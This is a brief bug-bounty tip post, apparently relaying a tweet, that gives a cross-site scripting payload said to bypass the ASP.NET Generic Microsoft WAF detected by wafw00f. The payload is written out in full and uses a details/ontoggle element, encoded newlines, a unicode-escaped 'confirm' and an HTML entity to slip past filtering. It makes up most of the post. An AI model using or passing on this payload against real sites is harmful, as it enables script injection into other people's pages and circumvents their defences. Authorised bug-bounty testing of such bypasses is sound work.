This XSS bypass works on ASPNET Generic Microsoft WAF, detected by AFW00F. The payload used is '<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//'. More technical details can be found in the original tweet. #bugbounty #bugbountytip
For more details, check out the original tweet here: https://twitter.com/grumpzsux/status/1785194902352982480